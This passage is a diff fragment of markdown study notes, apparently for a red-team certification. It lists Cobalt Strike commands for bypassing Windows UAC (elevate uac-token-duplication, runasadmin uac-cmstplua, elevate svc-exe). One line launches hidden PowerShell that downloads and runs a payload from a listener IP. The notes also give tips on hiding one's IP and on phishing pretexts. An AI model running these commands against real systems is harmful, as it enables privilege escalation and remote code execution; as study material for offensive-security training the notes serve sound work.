F-Masood/rand0m/24_CRTO.md

 4. Two methods are provided by **CS** for this **UAC Bypass** i.e. **elevate** and **runasadmin**
 5. in cobalt strike type: `elevate uac-token-duplication <your listner name>` e.g. ``elevate uac-token-duplication my1st64bit``
 6. in cobalt strike type: `runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"`
+7. If we dont have alot of user permissions we can again try elevate i.e. `elevate svc-exe tcp-4444-local`
 ### Miscellaneous good points
 1. While doing active reconnisane, use VPN to hide the real Public IP address.
 2. The **pretext** is the **"story"** behind why we want our target to open our email and carry out the desired actions.